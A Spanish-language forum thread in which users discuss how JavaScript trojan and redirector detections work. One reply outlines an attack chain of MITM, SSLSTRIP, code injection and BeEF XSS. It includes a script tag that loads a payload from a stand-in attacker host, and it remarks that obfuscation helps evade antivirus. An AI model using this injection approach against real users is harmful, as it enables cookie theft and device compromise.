Trojan:JS/Redirector y js: Trojan-Clicker. como funcionan?

Iniciado por dega1980, 13 Abril 2014, 14:09 PM

0 Miembros y 2 Visitantes están viendo este tema.

dega1980

He visto que en algunas webs cuando se cargan salta el escudo del antivirus,diciendo que ha detectado uno de estos archivos.

Alguien sabe que son y como funcionan,de verdad te pueden colar un virus nada mas por cargar una web?

saludos

daryo

Cita de: dega1980 en 13 Abril 2014, 14:09 PM
He visto que en algunas webs cuando se cargan salta el escudo del antivirus,diciendo que ha detectado uno de estos archivos.

Alguien sabe que son y como funcionan,de verdad te pueden colar un virus nada mas por cargar una web?

saludos

si se puede , es una de las razones por las que java ahora esta desactivado por defecto en los navegadores.
con respecto a los alertas decias googleando encontre:

http://www.f-secure.com/v-descs/trojan_w32_trojan-clicker.shtml
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:JS/Redirector.GZ

como yo lo veo no es precisamente un  troyano  :P
buenas

dega1980

Cita de: daryo en 13 Abril 2014, 14:35 PM
si se puede , es una de las razones por las que java ahora esta desactivado por defecto en los navegadores.
con respecto a los alertas decias googleando encontre:

http://www.f-secure.com/v-descs/trojan_w32_trojan-clicker.shtml
http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:JS/Redirector.GZ

como yo lo veo no es precisamente un  troyano  :P


si las alertas si que las vi hay informacion que dice que es un troyano como protegerse,lo que quiero entender es como funciona.
un saludo  :huh:

.:UND3R:.

Si mal no me equivoco es un troyano en javascript, la idea es combinarlo con un MITM + SSLSTRIP + inyección de código + Beef XSS (especie de troyano en javascript) o de forma alternativa ser dueño de una web popular o desfacear una y agregar el javascript de Beef XSS, la idea es así:
- El usuario ingresa a una página
- A través de MITM + SSLSTRIP toda página aun HTTPS se agrega un código:
<script type=java/script src=http://hackerweb.com/trojan.js> (no recuerdo bien)
- Este troyano, detecta el navegador, sistema operativo, permite agregar un iframe, activar la webcam a través de adobeflash player, stealer cookie, etc.
Lo bueno es que al ser javascript la ofuscación es fácil de hacer lo cual facilitaría el bypass de AV, desconozco si se realiza un análisis heurístico a javascript

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)